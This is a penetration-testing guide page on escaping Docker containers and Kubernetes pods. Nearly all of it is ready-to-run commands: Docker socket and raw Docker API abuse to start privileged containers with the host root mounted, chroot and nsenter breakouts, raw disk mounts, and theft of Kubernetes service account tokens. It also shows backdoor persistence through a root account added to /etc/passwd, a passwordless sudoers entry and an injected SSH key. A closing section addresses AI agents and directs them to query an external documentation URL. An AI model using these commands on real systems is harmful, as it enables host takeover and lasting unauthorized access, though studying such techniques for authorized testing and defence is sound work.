# Container escape techniques

## Container Escape Techniques

## What Makes Container Escape Dangerous

Container escape techniques exploit misconfigurations, vulnerabilities, or design flaws in containerization technologies to break out of isolated container environments and gain access to the host system. Successful escapes can lead to complete host compromise, access to other containers, and potential lateral movement within container orchestration platforms.

**The Attack Principle**: Exploit scenarios where:

* Containers run with excessive privileges or capabilities
* Host resources are improperly mounted into containers
* Container runtime vulnerabilities allow breakout
* Orchestration platforms have security misconfigurations
* Shared namespaces provide access to host resources

**Why This Works**: Containers share the host kernel and rely on namespace isolation. Misconfigurations or privilege escalations can break this isolation, allowing access to host resources and other containers.

## Container Environment Discovery and Enumeration

#### Identifying Container Environment

**Basic Container Detection:**

```bash
# Check if running in container
ls -la /.dockerenv
cat /proc/1/cgroup | grep docker
cat /proc/self/cgroup | grep docker

# Check for container runtime
ps aux | grep -E "(docker|containerd|runc)"
ls -la /var/run/docker.sock

# Check container metadata
env | grep -i container
cat /proc/version
uname -a
```

**Container Information Gathering:**

```bash
# Check container ID
hostname
cat /etc/hostname

# Check mounted filesystems
mount | grep -E "(proc|sys|dev)"
df -h

# Check available capabilities
capsh --print
cat /proc/self/status | grep Cap
```

**Network and Process Analysis:**

```bash
# Check network configuration
ip addr show
ip route show
cat /proc/net/route

# Check running processes
ps aux
ps -ef --forest

# Check for privileged processes
ps aux | grep "root"
```

## High-Value Container Escape Techniques

#### Docker Socket Escape

**Why Docker Socket is Critical**: Access to Docker socket allows full container management and host access.

**Docker Socket Detection:**

```bash
# Check for mounted Docker socket
ls -la /var/run/docker.sock
find / -name "docker.sock" 2>/dev/null

# Check if docker command is available
which docker
docker --version
```

**Docker Socket Exploitation:**

```bash
# List all containers
docker ps -a

# Create privileged container with host filesystem mounted
docker run -it --privileged --pid=host --net=host --ipc=host -v /:/host ubuntu chroot /host /bin/bash

# Alternative: Mount host root and escape
docker run -it -v /:/host ubuntu
chroot /host /bin/bash

# Create container with host network and mount
docker run -it --rm --net=host --pid=host --privileged -v /:/mnt alpine
chroot /mnt /bin/bash
```

#### Privileged Container Escape

**Privileged Container Detection:**

```bash
# Check if container is privileged
capsh --print | grep -i "current"
cat /proc/self/status | grep Cap

# Check for full capability set
capsh --decode=$(cat /proc/self/status | grep CapEff | awk '{print $2}')

# Look for dangerous capabilities
capsh --print | grep -E "(sys_admin|sys_ptrace|dac_override)"
```

**Privileged Escape via /proc:**

```bash
# Access host filesystem through /proc/1/root
ls -la /proc/1/root/

# Escape to host
chroot /proc/1/root /bin/bash

# Alternative: Access host through process namespace
nsenter -t 1 -m -u -i -n -p /bin/bash
```

**Privileged Escape via Device Access:**

```bash
# Check for host devices
ls -la /dev/
fdisk -l

# Mount host filesystem if raw disk access available
mkdir /mnt/host
mount /dev/sda1 /mnt/host
chroot /mnt/host /bin/bash
```

#### Capability-Based Escape

**CAP\_SYS\_ADMIN Escape:**

```bash
# Check for CAP_SYS_ADMIN
capsh --print | grep sys_admin

# Mount host filesystem
mkdir /tmp/host
mount -t proc proc /proc
mount --bind /proc/1/root /tmp/host
chroot /tmp/host /bin/bash

# Alternative: Create new mount namespace
unshare -m
mount --bind /proc/1/root /mnt
chroot /mnt /bin/bash
```

#### Volume Mount Escape

**Host Path Mount Detection:**

```bash
# Check mounted volumes
mount | grep -v "tmpfs\|proc\|sys"
df -h | grep -v "tmpfs\|udev"

# Look for host filesystem mounts
mount | grep -E "(/host|/var/lib/docker|/etc|/root)"

# Check for sensitive host directories
ls -la / | grep -E "(host|mnt)"
```

**Volume Mount Exploitation:**

```bash
# If /var/lib/docker is mounted
ls -la /var/lib/docker/containers/
cat /var/lib/docker/containers/*/config.json

# If /etc is mounted
echo 'hacker:x:0:0:root:/root:/bin/bash' >> /etc/passwd
echo 'hacker ALL=(ALL) NOPASSWD:ALL' > /etc/sudoers.d/hacker

# If SSH directories are mounted
mkdir -p /root/.ssh
echo 'ssh-rsa YOUR_KEY_HERE' >> /root/.ssh/authorized_keys
chmod 600 /root/.ssh/authorized_keys
```

## Kubernetes Pod Escape

#### Service Account Token Abuse

**Service Account Discovery:**

```bash
# Check for service account token
ls -la /var/run/secrets/kubernetes.io/serviceaccount/
cat /var/run/secrets/kubernetes.io/serviceaccount/token

# Get namespace
cat /var/run/secrets/kubernetes.io/serviceaccount/namespace

# Check API server access
curl -k -H "Authorization: Bearer $(cat /var/run/secrets/kubernetes.io/serviceaccount/token)" \
  https://kubernetes.default.svc.cluster.local/api/v1/namespaces
```

#### Pod Security Context Abuse

**Privileged Pod Detection:**

```bash
# Check if pod is privileged
cat /proc/self/status | grep Cap
capsh --print

# Check security context
env | grep -i security
ps aux | grep "security"
```

**Host Namespace Access:**

```bash
# If hostPID is true
ps aux | grep -v "grep\|ps"
nsenter -t 1 -m -u -i -n -p /bin/bash

# If hostNetwork is true
ip addr show
netstat -tulpn

# If hostIPC is true
ipcs -a
```

## Real-World Container Escape Examples

#### Example 1: Docker Socket Mount

**Discovery:**

```bash
# Found Docker socket mounted in container
ls -la /var/run/docker.sock
# Output: srw-rw---- 1 root docker 0 Dec 25 12:00 /var/run/docker.sock
```

**Exploitation:**

```bash
# Check if docker command available
which docker
# If not available, use curl to Docker API

# Escape using Docker API
curl -s --unix-socket /var/run/docker.sock \
  -X POST \
  -H "Content-Type: application/json" \
  -d '{"Image": "alpine", "Cmd": ["chroot", "/host", "/bin/sh"], "DetachKeys": "ctrl-p,ctrl-q", "OpenStdin": true, "Mounts": [{"Type": "bind", "Source": "/", "Target": "/host"}]}' \
  http://localhost/containers/create

# Start the container
curl -s --unix-socket /var/run/docker.sock \
  -X POST \
  http://localhost/containers/CONTAINER_ID/start

# Attach to escape container
curl -s --unix-socket /var/run/docker.sock \
  -X POST \
  http://localhost/containers/CONTAINER_ID/attach?stream=1&stdin=1&stdout=1&stderr=1
```

#### Example 2: Privileged Container with CAP\_SYS\_ADMIN

**Discovery:**

```bash
# Check container capabilities
capsh --print | grep sys_admin
# Output: Current: = cap_sys_admin+eip
```

**Exploitation:**

```bash
# Mount host filesystem
mkdir /tmp/hostfs
mount --bind /proc/1/root /tmp/hostfs

# Escape to host
chroot /tmp/hostfs /bin/bash

# Verify escape
ls -la /
cat /etc/hostname
# Should show host system, not container
```

## Key Operational Considerations

#### Success Indicators

* **Docker socket access** providing full container control
* **Privileged container** with host namespace access
* **Dangerous capabilities** enabling host filesystem access
* **Host path mounts** allowing direct host manipulation
* **Kubernetes API access** with pod creation permissions

#### Common Failure Points

* **Security contexts** preventing privileged operations
* **AppArmor/SELinux** blocking container escapes
* **Network policies** restricting API server access
* **Resource quotas** preventing pod creation
* **Runtime security** detecting escape attempts

#### Exploitation Notes

* **Development environments** often have relaxed container security
* **Legacy containers** may run with excessive privileges
* **Kubernetes misconfigurations** frequently provide escape opportunities
* **Monitoring gaps** may miss container escape activities

Container escape techniques are particularly effective in environments where container security best practices are not implemented, providing direct paths to host compromise and lateral movement within containerized infrastructures.


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://reaper.gitbook.io/my-penetration-test-guide/privilege-escalation/linux-privilege-escalation/container-escape-techniques.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.